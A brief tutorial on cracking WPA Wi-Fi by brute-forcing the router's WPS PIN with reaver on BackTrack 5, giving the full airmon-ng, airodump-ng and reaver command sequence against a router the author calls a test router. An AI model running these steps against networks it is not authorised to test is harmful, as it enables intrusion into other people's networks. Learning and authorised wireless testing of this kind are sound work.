BackTrack - Cracking a WPA password with reaver

Wi-Fi Protected Setup (WPS) was introdused to allow home users with little or no knowelage of wirelss security to set up a wireless network encrypted with WPA or WPA2 as well as making it easy to add new devices to an existing network without entering long passwords/passphrases.

In this example I will be using BackTrack 5 R1 Gnome 32 bit.

You can either boot off the DVD or install it. The creating of a bootable DVD and installing BackTrack is beyond the scope of this tutorial. 

I'm assuming you have two network connections one for internet access and one with your wireless adapter that we will be using in this test. In my case I'm using both a wired and wireless adapter.

Open up a terminal and run the following commands

apt-get update
apt-get install reaver


Next we need to find out what interface is assigned to your wireless card using the following command.


iwconfig


In my case wlan0
Next we need to put the wireless card in to monitor mode.


airmon-ng start wlan0


The monitor interface created is mon0
Next we need to find the BSSID of our test router we want to crack


airodump-ng wlan0


In my case 00:11:22:33:44:55
Next we launch reaver


reaver -i mon0 -b 00:11:22:33:44:55 -vv


Now sit back and wait, grab a cup or two of coffee, and let reaver do its thing. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my case it took just over 2 hours.